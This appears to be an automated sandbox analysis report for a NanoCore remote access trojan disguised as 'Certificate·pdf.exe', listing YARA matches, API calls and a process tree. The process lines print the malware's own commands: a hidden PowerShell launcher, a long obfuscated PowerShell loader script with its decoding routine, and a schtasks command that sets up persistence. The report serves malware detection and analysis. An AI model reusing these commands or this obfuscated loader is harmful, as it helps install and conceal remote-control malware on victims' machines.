      Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.evad.winEXE@13/15@189/2
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23D62EE2 AdjustTokenPrivileges,5_2_23D62EE2
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 5_2_23D62EAB AdjustTokenPrivileges,5_2_23D62EAB
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\SkamflelsensJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_03
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:304:WilStaging_02
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{48e0e383-40c8-47b1-a4ea-d717ed94d829}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:304:WilStaging_02
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsk2A12.tmpJump to behavior
      Source: Certificate#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Certificate#U00b7pdf.exeReversingLabs: Detection: 31%
      Source: Certificate#U00b7pdf.exeVirustotal: Detection: 53%
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeFile read: C:\Users\user\Desktop\Certificate#U00b7pdf.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Certificate#U00b7pdf.exe "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj 